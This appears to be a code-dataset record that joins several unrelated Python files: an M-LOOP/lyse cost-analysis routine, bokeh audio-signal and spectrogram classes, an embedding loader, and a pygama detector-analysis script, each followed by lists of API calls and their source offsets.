if n_shots > 1 and not config['ignore_bad']:
msgs.append(
f'runmanager is set to compile {n_shots:d} shots per request, but your '
+ 'mloop_config has ignore_bad = False. You are advised to (i) remove '
+ 'iterable globals so as to compile one shot per cost or (ii) set '
+ 'ignore_bad = True in your mloop_config and only return one cost with '
+ 'bad = False per sequence.'
)
if msgs:
logger.warning('\n'.join(msgs))
return False
else:
logger.debug('Runmanager ok.')
return True
def verify_globals(config):
logger.debug('Verifying globals...')
# Get the current runmanager globals
logger.debug('Getting values of globals from runmanager.')
rm_globals = rm.get_globals()
current_values = [rm_globals[name] for name in config['mloop_params']]
# Retrieve the parameter values requested by M-LOOP on this iteration
logger.debug('Getting requested globals values from lyse.routine_storage.')
requested_values = lyse.routine_storage.params
requested_dict = dict(zip(config['mloop_params'], requested_values))
# Get the parameter values for the shot we just computed the cost for
logger.debug('Getting lyse dataframe.')
df = lyse.data()
shot_values = [df[name].iloc[-1] for name in config['mloop_params']]
# Verify integrity by cross-checking against what was requested
if not np.array_equal(current_values, requested_values):
message = (
'Cost requested for values different to those in runmanager.\n'
'Please add an executed shot to lyse with: {requested_dict}'
).format(requested_dict=requested_dict)
logger.error(message)
return False
if not np.array_equal(shot_values, requested_values):
message = (
'Cost requested for different values to those used to compute cost.\n'
'Please add an executed shot to lyse with: {requested_dict}'
).format(requested_dict=requested_dict)
logger.error(message)
return False
logger.debug('Globals verified.')
return True
def cost_analysis(cost_key=(None,), maximize=True, x=None):
"""Return a cost dictionary to M-LOOP with at least:
{'bad': True} or {'cost': float}.
- Look for the latest cost in the cost_key column of the lyse
- DataFrame and an uncertainty ('u_' prefix at the lowest level).
- Report bad shot to M-LOOP if cost is nan or inf.
- Negate value in DataFrame if maximize = True.
- Fallback to reporting a constant or fake cost (from x).
"""
logger.debug('Getting cost...')
cost_dict = {'bad': False}
# Retrieve current lyse DataFrame
logger.debug('Getting lyse dataframe.')
df = lyse.data()
# Use the most recent shot
ix = -1
# Retrieve cost from specified column
if len(df) and cost_key in df:
cost = (df[cost_key].astype(float).values)[ix]
if np.isnan(cost) or np.isinf(cost):
cost_dict['bad'] = True
logger.info('Got bad cost: {cost}'.format(cost=cost))
else:
cost_dict['cost'] = (1 - 2 * maximize) * cost
logger.info('Got cost: {cost}'.format(cost=cost_dict['cost']))
u_cost_key = cost_key[:-1] + ('u_' + cost_key[-1],)
if u_cost_key in df:
cost_dict['uncer'] = df[u_cost_key].iloc[ix]
logger.info('Got uncertainty: {uncer}'.format(uncer=cost_dict['uncer']))
# If it doesn't exist, generate a fake cost
elif x is not None:
from fake_result import fake_result
cost_dict['cost'] = (1 - 2 * maximize) * fake_result(x)
logger.info('Faked cost: {cost}'.format(cost=cost_dict['cost']))
# Or just use a constant cost (for debugging)
else:
cost_dict['cost'] = 1.2
logger.info('Faked constant cost: {cost}'.format(cost=cost_dict['cost']))
return cost_dict
if __name__ == '__main__':
config = mloop_config.get()
configure_logging(config)
if not hasattr(lyse.routine_storage, 'queue'):
logger.info('First execution of lyse routine...')
try:
from queue import Queue
except ImportError:
# PY2
from Queue import Queue
logger.debug('Creating queue.')
lyse.routine_storage.queue = Queue()
if (
hasattr(lyse.routine_storage, 'optimisation')
and lyse.routine_storage.optimisation.is_alive()
):
cost_dict = cost_analysis(
cost_key=config['cost_key'] if not config['mock'] else [],
maximize=config['maximize'],
x=lyse.routine_storage.params[0] if config['mock'] else None,
)
if not cost_dict['bad'] or not config['ignore_bad']:
if check_runmanager(config):
if verify_globals(config):
logger.debug('Putting cost in queue.')
lyse.routine_storage.queue.put(cost_dict)
else:
message = 'NOT putting cost in queue because verify_globals failed.'
logger.debug(message)
else:
message = 'NOT putting cost in queue because check_runmanager failed.'
logger.debug(message)
else:
message = (
'NOT putting cost in queue because cost was bad and ignore_bad is True.'
)
logger.debug(message)
elif check_runmanager(config):
logger.info('(Re)starting optimisation process...')
import threading
import mloop_interface
logger.debug('Starting interface thread...')
lyse.routine_storage.optimisation = threading.Thread(
target=mloop_interface.main
)
lyse.routine_storage.optimisation.daemon = True
lyse.routine_storage.optimisation.start()
logger.debug('Interface thread started.')
else:
print(
'\nNot (re)starting optimisation process.',
'Please address above warnings before trying again.',
)
|
[
"numpy.isnan",
"labscript_utils.check_version",
"logging.Formatter",
"lyse.data",
"mloop_config.get",
"os.path.join",
"logging.FileHandler",
"lyse.routine_storage.queue.put",
"Queue.Queue",
"runmanager.remote.get_globals",
"threading.Thread",
"lyse.routine_storage.optimisation.is_alive",
"logging.StreamHandler",
"fake_result.fake_result",
"numpy.isinf",
"runmanager.remote.n_shots",
"runmanager.remote.get_run_shots",
"runmanager.remote.error_in_globals",
"lyse.routine_storage.optimisation.start",
"numpy.array_equal",
"logging.getLogger"
] |
[((313, 350), 'labscript_utils.check_version', 'check_version', (['"""lyse"""', '"""2.5.0"""', '"""4.0"""'], {}), "('lyse', '2.5.0', '4.0')\n", (326, 350), False, 'from labscript_utils import check_version\n'), ((352, 394), 'labscript_utils.check_version', 'check_version', (['"""zprocess"""', '"""2.13.1"""', '"""4.0"""'], {}), "('zprocess', '2.13.1', '4.0')\n", (365, 394), False, 'from labscript_utils import check_version\n'), ((396, 445), 'labscript_utils.check_version', 'check_version', (['"""labscript_utils"""', '"""2.12.5"""', '"""4.0"""'], {}), "('labscript_utils', '2.12.5', '4.0')\n", (409, 445), False, 'from labscript_utils import check_version\n'), ((685, 723), 'logging.getLogger', 'logging.getLogger', (['"""analysislib_mloop"""'], {}), "('analysislib_mloop')\n", (702, 723), False, 'import logging\n'), ((777, 866), 'logging.Formatter', 'logging.Formatter', (['"""%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s"""'], {}), "(\n '%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s')\n", (794, 866), False, 'import logging\n'), ((1708, 1724), 'runmanager.remote.get_globals', 'rm.get_globals', ([], {}), '()\n', (1722, 1724), True, 'import runmanager.remote as rm\n'), ((2079, 2100), 'runmanager.remote.error_in_globals', 'rm.error_in_globals', ([], {}), '()\n', (2098, 2100), True, 'import runmanager.remote as rm\n'), ((2219, 2231), 'runmanager.remote.n_shots', 'rm.n_shots', ([], {}), '()\n', (2229, 2231), True, 'import runmanager.remote as rm\n'), ((3050, 3066), 'runmanager.remote.get_globals', 'rm.get_globals', ([], {}), '()\n', (3064, 3066), True, 'import runmanager.remote as rm\n'), ((3559, 3570), 'lyse.data', 'lyse.data', ([], {}), '()\n', (3568, 3570), False, 'import lyse\n'), ((5096, 5107), 'lyse.data', 'lyse.data', ([], {}), '()\n', (5105, 5107), False, 'import lyse\n'), ((6339, 6357), 'mloop_config.get', 'mloop_config.get', ([], {}), '()\n', (6355, 6357), False, 'import mloop_config\n'), ((1036, 1069), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (1057, 1069), False, 'import logging\n'), ((1274, 1310), 'os.path.join', 'os.path.join', (['LOG_PATH', 'LOG_FILENAME'], {}), '(LOG_PATH, LOG_FILENAME)\n', (1286, 1310), False, 'import os\n'), ((1335, 1379), 'logging.FileHandler', 'logging.FileHandler', (['full_filename'], {'mode': '"""w"""'}), "(full_filename, mode='w')\n", (1354, 1379), False, 'import logging\n'), ((1932, 1950), 'runmanager.remote.get_run_shots', 'rm.get_run_shots', ([], {}), '()\n', (1948, 1950), True, 'import runmanager.remote as rm\n'), ((3728, 3776), 'numpy.array_equal', 'np.array_equal', (['current_values', 'requested_values'], {}), '(current_values, requested_values)\n', (3742, 3776), True, 'import numpy as np\n'), ((4064, 4109), 'numpy.array_equal', 'np.array_equal', (['shot_values', 'requested_values'], {}), '(shot_values, requested_values)\n', (4078, 4109), True, 'import numpy as np\n'), ((6717, 6724), 'Queue.Queue', 'Queue', ([], {}), '()\n', (6722, 6724), False, 'from Queue import Queue\n'), ((6803, 6847), 'lyse.routine_storage.optimisation.is_alive', 'lyse.routine_storage.optimisation.is_alive', ([], {}), '()\n', (6845, 6847), False, 'import lyse\n'), ((5304, 5318), 'numpy.isnan', 'np.isnan', (['cost'], {}), '(cost)\n', (5312, 5318), True, 'import numpy as np\n'), ((5322, 5336), 'numpy.isinf', 'np.isinf', (['cost'], {}), '(cost)\n', (5330, 5336), True, 'import numpy as np\n'), ((8105, 8150), 'threading.Thread', 'threading.Thread', ([], {'target': 'mloop_interface.main'}), '(target=mloop_interface.main)\n', (8121, 8150), False, 'import threading\n'), ((8241, 8282), 'lyse.routine_storage.optimisation.start', 'lyse.routine_storage.optimisation.start', ([], {}), '()\n', (8280, 8282), False, 'import lyse\n'), ((6000, 6014), 'fake_result.fake_result', 'fake_result', (['x'], {}), '(x)\n', (6011, 6014), False, 'from fake_result import fake_result\n'), ((7323, 7364), 'lyse.routine_storage.queue.put', 'lyse.routine_storage.queue.put', (['cost_dict'], {}), '(cost_dict)\n', (7353, 7364), False, 'import lyse\n')]
|
from .util import Audio
from abc import ABC, abstractmethod
import numpy as np
from scipy import fft, signal
from IPython.display import display
from bokeh.plotting import figure, show
from bokeh.layouts import gridplot
from bokeh.models.mappers import LinearColorMapper
from bokeh.models.ranges import DataRange1d
from bokeh.models.tools import HoverTool
from bokeh.palettes import Viridis256
from bokeh.io import output_notebook
output_notebook()
def get_samples_and_rate(input_signal, samplerate):
if isinstance(input_signal, TimeSignal):
if samplerate is not None:
print('Explicitly defined samplerate gets ignored when input is a TimeSignal', samplerate)
samples = input_signal.samples
samplerate = input_signal.samplerate
elif np.ndim(input_signal) > 0:
if samplerate is None:
raise ValueError('The samplerate needs to be defined explicitly when input is an array or other iterable')
samples = np.asarray(input_signal)
else:
raise TypeError('Only TimeSignals, Numpy arrays or other iterables are supported as input, not {}'.format(type(input_signal)))
return samples, samplerate
def get_samples(input_signal):
if isinstance(input_signal, TimeSignal):
return input_signal.samples
elif np.ndim(input_signal) > 0:
return np.asarray(input_signal)
else:
raise TypeError('Only TimeSignals, Numpy arrays or other iterables are supported as input, not {}'.format(type(input_signal)))
def get_both_samples_and_rate(input_signal1, input_signal2, samplerate=None):
samples1, samplerate1 = get_samples_and_rate(input_signal1, samplerate)
samples2, samplerate2 = get_samples_and_rate(input_signal2, samplerate)
if samplerate1 != samplerate2:
raise ValueError('Both signals need to have the same samplerate')
return samples1, samples2, samplerate1
def get_both_samples(input_signal1, input_signal2):
samples1 = get_samples(input_signal1)
samples2 = get_samples(input_signal2)
if isinstance(input_signal1, TimeSignal) and isinstance(input_signal2, TimeSignal) and input_signal1.samplerate != input_signal2.samplerate:
raise ValueError('Both signals need to have the same samplerate')
return samples1, samples2
def same_type_as(output_samples, input_signal):
if isinstance(input_signal, TimeSignal):
return type(input_signal)(output_samples, input_signal.samplerate)
else:
return output_samples
class Signal(ABC):
@abstractmethod
def plot(self, **fig_args):
pass
def _repr_html_(self):
return show(self.plot())
def display(self, **fig_args):
show(self.plot(**fig_args))
class TimeSignal(Signal):
def __init__(self, samples, samplerate):
self.samples = samples
self.samplerate = samplerate
self.timepoints = np.arange(len(samples)) / samplerate
def plot(self, **fig_args):
fig = figure(width=800, height=400, x_axis_label='time [s]', y_axis_label='amplitude',
tools='pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset', active_drag='pan')
fig.line(self.timepoints, self.samples, line_width=2)
return fig
class AudioSignal(TimeSignal):
def __init__(self, samples, samplerate):
super().__init__(samples, samplerate)
def play(self, normalize=False):
return display(Audio(self.samples, rate=self.samplerate, normalize=normalize))
def plot(self, **fig_args):
default_args = {
'width': 900, 'height': 300,
'x_axis_label': 'time [s]', 'y_axis_label': 'amplitude',
'y_range': (-1, 1),
'tools': 'xpan,xwheel_zoom,box_zoom,xzoom_in,xzoom_out,save,reset',
'active_drag': 'xpan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
}
hover_tool = HoverTool(
tooltips=[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')],
mode='vline',
)
fig = figure(**{**default_args, **fig_args})
fig.line(self.timepoints, self.samples, line_width=2)
fig.add_tools(hover_tool)
return fig
class Spectrum(Signal):
def __init__(self, input, samplerate=None, num_bins=None, power=1, decibels=True):
samples, samplerate = get_samples_and_rate(input, samplerate)
if num_bins is None:
num_bins = len(samples)
self.power = power
self.decibels = decibels
self.spectrum = np.abs(fft.rfft(samples, num_bins))
self.frequencies = np.arange(len(self.spectrum)) * samplerate / num_bins
if decibels:
self.spectrum = power * 10 * np.log10(self.spectrum)
else:
self.spectrum **= power
def plot(self, **fig_args):
default_args = {
'width': 900, 'height': 300,
'x_axis_label': 'frequency [Hz]', 'y_axis_label': 'amplitude',
'tools': 'pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset',
'active_drag': 'pan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
}
hover_tool = HoverTool(
tooltips=[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}']],
mode='vline',
)
if self.power == 2:
default_args['y_axis_label'] = 'power'
hover_tool.tooltips[1][0] = 'power'
if self.decibels:
default_args['y_axis_label'] += ' [dB]'
hover_tool.tooltips[1][0] += ' [dB]'
fig = figure(**{**default_args, **fig_args})
fig.line(self.frequencies, self.spectrum, line_width=2)
fig.add_tools(hover_tool)
return fig
class PowerSpectrum(Spectrum):
def __init__(self, input, samplerate=None, num_bins=None, decibels=True):
super().__init__(input, samplerate=samplerate, num_bins=num_bins, power=2, decibels=decibels)
class Spectrogram(Signal):
def __init__(self, input_signal, frame_duration, step_duration, samplerate=None, num_bins=None, window='hann', power=1, decibels=True):
samples, samplerate = get_samples_and_rate(input_signal, samplerate)
self.power = power
self.decibels = decibels
frame_size = round(frame_duration * samplerate)
overlap_size = round((frame_duration-step_duration) * samplerate)
self.frequencies, self.times, self.array = signal.stft(samples, fs=samplerate, window=window, nperseg=frame_size, noverlap=overlap_size)
if decibels:
self.array = power * 10 * np.log10(self.array)
else:
self.array **= power
def plot(self, lowest_value=None, highest_value=None, palette=None, **fig_args):
if not palette:
palette = list(reversed(Viridis256))
if not lowest_value:
lowest_value = np.min(np.abs(self.array))
if not highest_value:
highest_value = np.max(np.abs(self.array))
default_args = {
'width': 900, 'height': 400,
'x_axis_label': 'time [s]', 'y_axis_label': 'frequency [Hz]',
'tools': 'hover,pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset',
'active_drag': 'pan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
'tooltips': [('time [s]', '$x{0.000}'), ('frequency [Hz]', '$y{0.}'), ['amplitude', '@image']],
}
if self.power == 2:
default_args['tooltips'][2][0] = 'power'
if self.decibels:
default_args['tooltips'][2][0] += ' [dB]'
fig = figure(**{**default_args, **fig_args})
if isinstance(fig.x_range, DataRange1d):
fig.x_range.range_padding = 0
if isinstance(fig.y_range, DataRange1d):
fig.y_range.range_padding = 0
mapper = LinearColorMapper(palette=palette, low=lowest_value, high=highest_value)
fig.image([np.abs(self.array)], x=self.times[0], y=self.frequencies[0], dw=self.times[-1], dh=self.frequencies[-1], color_mapper=mapper)
return fig
|
[
"bokeh.io.output_notebook",
"bokeh.plotting.figure",
"numpy.abs",
"numpy.asarray",
"scipy.fft.rfft",
"numpy.ndim",
"bokeh.models.tools.HoverTool",
"bokeh.models.mappers.LinearColorMapper",
"numpy.log10",
"scipy.signal.stft"
] |
[((431, 448), 'bokeh.io.output_notebook', 'output_notebook', ([], {}), '()\n', (446, 448), False, 'from bokeh.io import output_notebook\n'), ((2962, 3132), 'bokeh.plotting.figure', 'figure', ([], {'width': '(800)', 'height': '(400)', 'x_axis_label': '"""time [s]"""', 'y_axis_label': '"""amplitude"""', 'tools': '"""pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset"""', 'active_drag': '"""pan"""'}), "(width=800, height=400, x_axis_label='time [s]', y_axis_label=\n 'amplitude', tools=\n 'pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset', active_drag='pan')\n", (2968, 3132), False, 'from bokeh.plotting import figure, show\n'), ((3933, 4026), 'bokeh.models.tools.HoverTool', 'HoverTool', ([], {'tooltips': "[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')]", 'mode': '"""vline"""'}), "(tooltips=[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')],\n mode='vline')\n", (3942, 4026), False, 'from bokeh.models.tools import HoverTool\n'), ((4072, 4110), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (4078, 4110), False, 'from bokeh.plotting import figure, show\n'), ((5250, 5347), 'bokeh.models.tools.HoverTool', 'HoverTool', ([], {'tooltips': "[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}']]", 'mode': '"""vline"""'}), "(tooltips=[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}'\n ]], mode='vline')\n", (5259, 5347), False, 'from bokeh.models.tools import HoverTool\n'), ((5646, 5684), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (5652, 5684), False, 'from bokeh.plotting import figure, show\n'), ((6506, 6603), 'scipy.signal.stft', 'signal.stft', (['samples'], {'fs': 'samplerate', 'window': 'window', 'nperseg': 'frame_size', 'noverlap': 'overlap_size'}), '(samples, fs=samplerate, window=window, nperseg=frame_size,\n noverlap=overlap_size)\n', (6517, 6603), False, 'from scipy import fft, signal\n'), ((7732, 7770), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (7738, 7770), False, 'from bokeh.plotting import figure, show\n'), ((7970, 8042), 'bokeh.models.mappers.LinearColorMapper', 'LinearColorMapper', ([], {'palette': 'palette', 'low': 'lowest_value', 'high': 'highest_value'}), '(palette=palette, low=lowest_value, high=highest_value)\n', (7987, 8042), False, 'from bokeh.models.mappers import LinearColorMapper\n'), ((779, 800), 'numpy.ndim', 'np.ndim', (['input_signal'], {}), '(input_signal)\n', (786, 800), True, 'import numpy as np\n'), ((974, 998), 'numpy.asarray', 'np.asarray', (['input_signal'], {}), '(input_signal)\n', (984, 998), True, 'import numpy as np\n'), ((1298, 1319), 'numpy.ndim', 'np.ndim', (['input_signal'], {}), '(input_signal)\n', (1305, 1319), True, 'import numpy as np\n'), ((1340, 1364), 'numpy.asarray', 'np.asarray', (['input_signal'], {}), '(input_signal)\n', (1350, 1364), True, 'import numpy as np\n'), ((4569, 4596), 'scipy.fft.rfft', 'fft.rfft', (['samples', 'num_bins'], {}), '(samples, num_bins)\n', (4577, 4596), False, 'from scipy import fft, signal\n'), ((4742, 4765), 'numpy.log10', 'np.log10', (['self.spectrum'], {}), '(self.spectrum)\n', (4750, 4765), True, 'import numpy as np\n'), ((6660, 6680), 'numpy.log10', 'np.log10', (['self.array'], {}), '(self.array)\n', (6668, 6680), True, 'import numpy as np\n'), ((6950, 6968), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (6956, 6968), True, 'import numpy as np\n'), ((7035, 7053), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (7041, 7053), True, 'import numpy as np\n'), ((8062, 8080), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (8068, 8080), True, 'import numpy as np\n')]
|
import pandas as pd
import numpy as np
from urllib.parse import urlparse
import io
import gc
import re
import string
from utils import *
import tensorflow as tf
def load_vectors(fname,count_words):
fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
data = {}
data_list=[]
for line in fin:
tokens = line.rstrip().split(' ')
tk = tokens[0]
if tk in count_words:
vec=list(map(float, tokens[1:]))
data[tk] = vec
data_list.append(vec)
return data,data_list
def glove_load_vectors(fname,count_words):
data={}
fastvec = open(fname)
counter=1
data_list=[]
while counter>0:
try:
f=fastvec.__next__()
tokens = f.rstrip().split(' ')
tk=tokens[0]
if tk in count_words:
vec = list(map(float, tokens[1:]))
data[tk] = vec
data_list.append(vec)
counter+=1
except:
print("total tokens",counter)
counter=0
pass
return data,data_list
def create_embeddings(train_data,embedding_path,wordvec_name,stop_set,word_dim):
entity1 = train_data["entities"].apply(lambda x: combine_entity(x))
mention_dt = train_data["hashtags"].apply(lambda x: hashtag(x))
url_dt1 = train_data["urls"].apply(lambda x: process_urlPath(x,0,stop_set))
url_dt2 = train_data["urls"].apply(lambda x: process_urlPath(x,1,stop_set))
mention_splt = train_data["mentions"].apply(lambda x: hashtag(x))
dt_concat =pd.concat([entity1,mention_dt,url_dt1,url_dt2,mention_splt],axis=0)
print("create entity tokenizer")
tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='',
lower=True,
split=" ",
char_level=False,
oov_token=None)
#tokenizer.fit_on_texts(pd.concat([entity1,mention_dt,url_dt,mention_splt],axis=0))
tokenizer.fit_on_texts(dt_concat)
count_thres = 15
count_words = {w:c for w,c in tokenizer.word_counts.items() if c >= count_thres}
word_counts= len(count_words)+1#one for oov and one for less count words
tokenizer = tf.keras.preprocessing.text.Tokenizer(
num_words=word_counts,
filters='',
lower=True,
split=" ",
char_level=False,
oov_token=None)
#tokenizer.fit_on_texts(pd.concat([entity1,mention_dt,url_dt,mention_splt],axis=0))
tokenizer.fit_on_texts(dt_concat)
print("load embedding vectors")
if wordvec_name.split(".")[0]=="glove":
fastvec,fastvec_list = glove_load_vectors(embedding_path,count_words)
else:
fastvec,fastvec_list = load_vectors(embedding_path,count_words)
cand=np.array(fastvec_list,dtype='float32')
mu=np.mean(cand, axis=0)
Sigma=np.cov(cand.T)
norm=np.random.multivariate_normal(mu, Sigma, 1)
norm = list(np.reshape(norm, word_dim))
word_counts = len(count_words)+1
word_vectors = np.zeros((word_counts,word_dim))
id_w = tokenizer.index_word
for k in range(1,word_vectors.shape[0]):
ky = id_w[k]
if ky in fastvec:
word_vectors[k,:]=fastvec[ky]
else:
word_vectors[k,:]= norm
return tokenizer,word_counts,word_vectors
|
[
"tensorflow.keras.preprocessing.text.Tokenizer",
"numpy.zeros",
"numpy.mean",
"numpy.array",
"numpy.random.multivariate_normal",
"numpy.reshape",
"io.open",
"numpy.cov",
"pandas.concat"
] |
[((213, 281), 'io.open', 'io.open', (['fname', '"""r"""'], {'encoding': '"""utf-8"""', 'newline': '"""\n"""', 'errors': '"""ignore"""'}), "(fname, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n", (220, 281), False, 'import io\n'), ((1759, 1831), 'pandas.concat', 'pd.concat', (['[entity1, mention_dt, url_dt1, url_dt2, mention_splt]'], {'axis': '(0)'}), '([entity1, mention_dt, url_dt1, url_dt2, mention_splt], axis=0)\n', (1768, 1831), True, 'import pandas as pd\n'), ((1886, 1996), 'tensorflow.keras.preprocessing.text.Tokenizer', 'tf.keras.preprocessing.text.Tokenizer', ([], {'filters': '""""""', 'lower': '(True)', 'split': '""" """', 'char_level': '(False)', 'oov_token': 'None'}), "(filters='', lower=True, split=' ',\n char_level=False, oov_token=None)\n", (1923, 1996), True, 'import tensorflow as tf\n'), ((2367, 2500), 'tensorflow.keras.preprocessing.text.Tokenizer', 'tf.keras.preprocessing.text.Tokenizer', ([], {'num_words': 'word_counts', 'filters': '""""""', 'lower': '(True)', 'split': '""" """', 'char_level': '(False)', 'oov_token': 'None'}), "(num_words=word_counts, filters='',\n lower=True, split=' ', char_level=False, oov_token=None)\n", (2404, 2500), True, 'import tensorflow as tf\n'), ((2928, 2967), 'numpy.array', 'np.array', (['fastvec_list'], {'dtype': '"""float32"""'}), "(fastvec_list, dtype='float32')\n", (2936, 2967), True, 'import numpy as np\n'), ((2974, 2995), 'numpy.mean', 'np.mean', (['cand'], {'axis': '(0)'}), '(cand, axis=0)\n', (2981, 2995), True, 'import numpy as np\n'), ((3006, 3020), 'numpy.cov', 'np.cov', (['cand.T'], {}), '(cand.T)\n', (3012, 3020), True, 'import numpy as np\n'), ((3030, 3073), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['mu', 'Sigma', '(1)'], {}), '(mu, Sigma, 1)\n', (3059, 3073), True, 'import numpy as np\n'), ((3175, 3208), 'numpy.zeros', 'np.zeros', (['(word_counts, word_dim)'], {}), '((word_counts, word_dim))\n', (3183, 3208), True, 'import numpy as np\n'), ((3090, 3116), 'numpy.reshape', 'np.reshape', (['norm', 'word_dim'], {}), '(norm, word_dim)\n', (3100, 3116), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
import os, time, json
import numpy as np
import pandas as pd
from pprint import pprint
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from matplotlib.colors import LogNorm
import scipy.signal as signal
import argparse
import pdb
import tinydb as db
from pygama import DataSet
from pygama.analysis.calibration import *
from pygama.analysis.histograms import *
import pygama.utils as pgu
from matplotlib.lines import Line2D
from pygama.utils import set_plot_style
set_plot_style("clint")
def main():
"""
mj60 waveform viewer
"""
run_db, cal_db = "runDB.json", "calDB.json"
par = argparse.ArgumentParser(description="waveform viewer for mj60")
arg, st, sf = par.add_argument, "store_true", "store_false"
arg("-ds", nargs='*', action="store", help="load runs for a DS")
arg("-r", "--run", nargs=1, help="load a single run")
arg("-db", "--writeDB", action=st, help="store results in DB")
args = vars(par.parse_args())
# -- declare the DataSet --
if args["ds"]:
ds_lo = int(args["ds"][0])
try:
ds_hi = int(args["ds"][1])
except:
ds_hi = None
ds = DataSet(ds_lo, ds_hi,
md=run_db, cal = cal_db) #,tier_dir=tier_dir)
if args["run"]:
ds = DataSet(run=int(args["run"][0]),
md=run_db, cal=cal_db)
# Which run number is the being analyzed
# run = 249
# run = 214
# run = 204
# run = 278
# working on analysis for the AvsE cut in mj60
# t1df, t2df = chunker(run)
# cutwf, t2cut = cutter(t1df, t2df, run)
# histograms(cutwf, t2cut, run)
# histograms(ds)
drift_correction(ds, ds_lo)
# def histograms(t1df, t2df, run):
def histograms(ds):
t2 = ds.get_t2df()
print(t2.columns)
exit()
t2df = os.path.expandvars('{}/Spectrum_{}.hdf5'.format(meta_dir,run))
t2df = pd.read_hdf(t2df, key="df")
# n = "tslope_savgol"
# n = "current_max"
# n = "tslope_pz"
n = "tail_tau"
# n = "tail_amp"
e = "e_cal"
x = t2df[e]
# y = t2df[n]
y = t2df[n] / x
plt.clf()
# H, xedges, yedges = np.histogram2d(t2df["tail_tau"], t2df["e_ftp"], bins=[2000,200], range=[[0, 6600], [0, 5]])
plt.hist2d(x, y, bins=[1000,200], range=[[0, 200], [0, .001]], norm=LogNorm(), cmap='jet')
# plt.hist2d(x, y, bins=[1000,1000], norm=LogNorm())
# plt.scatter(H[0],H[1])
# f = plt.figure(figsize=(20,5))
# p1 = f.add_subplot(111, title='Test', xlabel='Energy (keV)', ylabel=n)
# h1,xedg1,yedg1 = np.histogram2d(x, y, bins=[1000,200], range=[[0,2000],[0,100]])
# h1 = h1.T
# # hMin, hMax = np.amin(h1), np.amax(h1)
# # im1 = p1.imshow(h1,cmap='jet',vmin=hMin,vmax=hMax, aspect='auto') #norm=LogNorm())
# im1 = p1.imshow(h1,cmap='jet', origin='lower', aspect='auto', norm=LogNorm(), extent=[xedg1[0], xedg1[-1], yedg1[0], yedg1[-1]])
# cb1 = f.colorbar(im1, ax=p1)#, fraction=0.037, pad=0.04)
cbar = plt.colorbar()
# plt.xscale('symlog')
# plt.yscale('symlog')
plt.title("Run {}".format(run))
plt.xlabel("Energy (keV)", ha='right', x=1)
plt.ylabel(n, ha='right', y=1)
# cbar.ax.set_ylabel('Counts')
# plt.ylabel("tslope_savgol", ha='right', y=1)
# plt.ylabel("A/E_ftp", ha='right', y=1)
# plt.tight_layout()
# # plt.savefig('./plots/meeting_plots/run{}_{}_vs_{}.png'.format(run, n, e))
# plt.show()
# xlo, xhi, xpb = 0, 10000, 10
# xP, hP = get_hist(t2df["trap_max"], xlo, xhi, xpb)
#
# plt.plot(xP, hP, ls='steps', lw=1.5, c='m',
# label="pygama trap_max, {} cts".format(sum(hP)))
# plt.xlabel("Energy (uncal)", ha='right', x=1)
# plt.ylabel("Counts", ha='right', y=1)
# plt.legend()
plt.tight_layout()
plt.show()
def chunker(run):
t1df = os.path.expandvars('{}/t1_run{}.h5'.format(tier_dir,run))
t2df = os.path.expandvars('{}/Spectrum_{}.hdf5'.format(meta_dir,run))
t2df = pd.read_hdf(t2df, key="df")
t2df_chunk = t2df[:75000]
key = "/ORSIS3302DecoderForEnergy"
wf_chunk = pd.read_hdf(t1df, key, where="ievt < {}".format(75000))
wf_chunk.reset_index(inplace=True) # required step -- fix pygama "append" bug
t2df = t2df.reset_index(drop=True)
# create waveform block. mask wfs of unequal lengths
icols = []
for idx, col in enumerate(wf_chunk.columns):
if isinstance(col, int):
icols.append(col)
wf_block = wf_chunk[icols].values
# print(wf_block.shape, type(wf_block))
# print(t2df_chunk)
return wf_block, t2df_chunk
def cutter(t1df, t2df, run):
# t2cut = t2df.loc[(t2df.e_cal>3.1099]
t2cut = t2df
print(t2cut.index)
print(t2cut)
cutwf = t1df[t2cut.index]
print(cutwf)
# xvals = np.arange(0,3000)
# start = time.time()
# for i in range(len(t2cut.index)):
# # for i in range(0,5):
# plt.plot(xvals, cutwf[i], lw=1)
# plt.xlabel('Sample Number', ha='right', x=1.0)
# plt.ylabel('ADC Value', ha='right', y=1.0)
# plt.tight_layout()
# plt.show()
return cutwf, t2cut
def drift_correction(ds, ds_lo):
## testing a drift time correction code
# t1df = ds.get_t1df()
# t1df.reset_index(inplace=True)
# t2df = ds.get_t2df()
"""
Take a single DataSet and window it so that the output file only contains
events near an expected peak location.
"""
# a user has to figure out the uncalibrated energy range of the K40 peak
# xlo, xhi, xpb = 0, 2e6, 2000 # show phys. spectrum (top feature is 2615 pk)
# xlo, xhi, xpb = 990000, 1030000, 250 # k40 peak, ds 3
t2df = ds.get_t2df()
calDB = ds.calDB
